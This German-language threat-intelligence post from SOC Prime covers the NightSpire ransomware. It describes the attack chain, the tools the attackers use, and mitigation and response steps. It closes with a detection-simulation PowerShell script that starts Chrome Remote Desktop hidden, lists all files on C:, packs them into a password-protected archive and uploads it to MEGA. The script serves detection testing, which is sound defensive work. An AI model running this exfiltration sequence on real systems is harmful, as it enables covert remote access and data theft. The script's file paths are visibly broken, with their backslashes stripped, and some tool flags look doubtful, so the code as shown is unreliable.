SOC Prime Bias: Hoch

25 May 2026 16:25 UTC

NightSpire Ransomware-Angriffskette, Werkzeuge und Taktiken

Author Photo
SOC Prime Team linkedin icon Folgen
NightSpire Ransomware-Angriffskette, Werkzeuge und Taktiken
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

NightSpire ist eine auf Go basierende Ransomware-Familie, die erstmals Anfang 2025 beobachtet wurde und ein Doppel-Erpressungsmodell verwendet, bei dem Daten vor der Verschlüsselung gestohlen und mit der Veröffentlichung auf einer Tor-basierten Leak-Site gedroht wird. Die Ransomware hängt eine .nspire -Erweiterung an verschlüsselte Dateien an und platziert Lösegeldforderungen in jedem betroffenen Verzeichnis, einschließlich der mit OneDrive verbundenen Ordner. Ihre Betreiber verlassen sich auf legitime Remote-Administrationstools, um den Zugang aufrechtzuerhalten, und nutzen öffentlich verfügbare Dienstprogramme für die Erkundung, Archivierung und Exfiltration. Zwischen März und Juni 2025 betraf die Kampagne mindestens 64 Organisationen in 33 Ländern.

Untersuchung

Die Untersuchung ergab, dass Angreifer häufig über exponiertes RDP anfänglichen Zugang erlangten und dann Chrome Remote Desktop und AnyDesk als persistente Dienste installierten. Sie nutzten Everything, um schnell Dateien zu finden, 7-Zip, um kennwortgeschützte Archive zu erstellen, und MEGAsync, um gestohlene Daten in den MEGA-Cloud-Speicher hochzuladen. Der auf Go basierende Verschlüsseler lief unter conhost.exe, zählte alle verfügbaren Laufwerke auf und verschlüsselte Dateien, während die OneDrive-Dateinamen unverändert blieben. Die Erpressungsphase stützte sich auf eine Tor-gehostete Leak-Site, die genutzt wurde, um Opfer nach der Exfiltration unter Druck zu setzen.

Minderung

Organisationen sollten die direkte RDP-Exposition reduzieren oder eliminieren, auf die unerwartete Bereitstellung legitimer Remote-Administrationstools als Dienste überwachen und Anwendungs-Whitelisting für Binärdateien wie Chrome Remote Desktop und AnyDesk anwenden. Verhaltensbasierte Erkennungen sollten sich auf die Massen-Dateienummerierung, Archivierung und ungewöhnliche Uploads zu Cloud-Speicherdiensten konzentrieren. Regelmäßige Backups und getestete Wiederherstellungsverfahren bleiben unerlässlich, und Netzwerkregeln sollten bekannte MEGA-Upload-Endpunkte blockieren. Verteidigungsmaßnahmen können auch durch kontrollierte Ransomware-Simulationsübungen wie die von Picus angeboten validiert werden.

Reaktion

Wenn NightSpire-Aktivität erkannt wird, isolieren Sie sofort den betroffenen Endpunkt, beenden Sie den Verschlüsselungsprozess und sammeln Sie flüchtigen Speicher zur Analyse. Deaktivieren Sie bösartige Dienste, entfernen Sie persistente Remote-Zugriffstools und blockieren Sie die zugehörige Netzwerkkommunikation. Die Wiederherstellung sollte von vertrauenswürdigen Backups erfolgen, und relevante Interessengruppen sollten benachrichtigt werden. Der Vorfall sollte auch den Strafverfolgungsbehörden gemeldet werden, während Verteidiger weiterhin die zugehörige Tor-Leak-Site auf Anzeichen veröffentlichter Daten überwachen.

Angriffsfluss

Simulation Ausführung

Voraussetzung: Die Telemetrie- und Basislinien-Vorprüfung muss bestanden werden.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die die Erkennungsregel auslösen soll. Die Befehle und Erzählungen müssen die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffs-Narrativ & Befehle:

    1. Persistenz-Setup (T1547 / T1219): Chrome Remote Desktop (Standardpfad) installieren und dessen Dienst starten, um beständigen Fernzugriff zu erhalten.
    2. Entdeckung (T1083): Everything.exe verwenden, um alle Dateien auf dem C: Laufwerk zu erfassen und die Ausgabe in einer temporären Liste zu speichern.
    3. Archivierung (T1037 / T1083): 7‑Zip aufrufen, um die erfassten Dateien in ein kennwortgeschütztes Archiv zu komprimieren.
    4. Exfiltration (T1219.003): MEGAsync starten, um das Archiv zu einem MEGA-Konto hochzuladen.

    Die Sequenz stellt sicher, dass selection_remote_access (Chrome Remote Desktop) aktiv ist, während mindestens einer von selection_discovery, selection_archive, oder selection_exfiltration auftritt und die Bedingung der Regel erfüllt.

  • Regressionstest-Skript:

    # -------------------------------------------------------------------------
    # NightSpire Seitliche Persistenz & Exfiltration Simulation
    # -------------------------------------------------------------------------
    # Voraussetzungen:
    #   - Chrome Remote Desktop im Standardpfad installiert
    #   - Everything.exe im Standardpfad installiert
    #   - 7z.exe im Standardpfad installiert
    #   - MEGAsync im Standardbenutzerprofilpfad installiert
    # -------------------------------------------------------------------------
    
    # 1. Chrome Remote Desktop-Dienst sicherstellen (simuliert Persistenz)
    $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe"
    if (Test-Path $crdPath) {
        Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden
        Write-Host "Chrome Remote Desktop-Dienst gestartet."
    } else {
        Write-Error "Chrome Remote Desktop nicht gefunden bei $crdPath"
        exit 1
    }
    
    # 2. Dateierfassung mit Everything
    $everythingPath = "$Env:ProgramFilesEverythingEverything.exe"
    $discoveryOutput = "$env:TEMPfilelist.txt"
    if (Test-Path $everythingPath) {
        & $everythingPath -search "C:" -output $discoveryOutput
        Write-Host "Erfassung abgeschlossen, Ergebnisse gespeichert in $discoveryOutput"
    } else {
        Write-Error "Everything.exe nicht gefunden bei $everythingPath"
        exit 1
    }
    
    # 3. Die erfassten Dateien mit 7‑Zip archivieren
    $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe"
    $archivePath   = "$env:TEMPexfil_archive.zip"
    if (Test-Path $sevenZipPath) {
        & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StarkP@ssw0rd!"
        Write-Host "Archiv erstellt bei $archivePath"
    } else {
        Write-Error "7z.exe nicht gefunden bei $sevenZipPath"
        exit 1
    }
    
    # 4. Archiv über MEGAsync hochladen (Exfiltration)
    $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe"
    if (Test-Path $megaPath) {
        & $megaPath --upload $archivePath
        Write-Host "Upload über MEGAsync initiiert."
    } else {
        Write-Error "MEGAsync.exe nicht gefunden bei $megaPath"
        exit 1
    }
    
    # Ende der Simulation
  • Bereinigung-Befehle:

    # Chrome Remote Desktop-Dienst stoppen
    Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue
    
    # Temporäre Dateien entfernen
    Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue
    
    # MEGAsync ggf. stoppen, falls es läuft
    Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue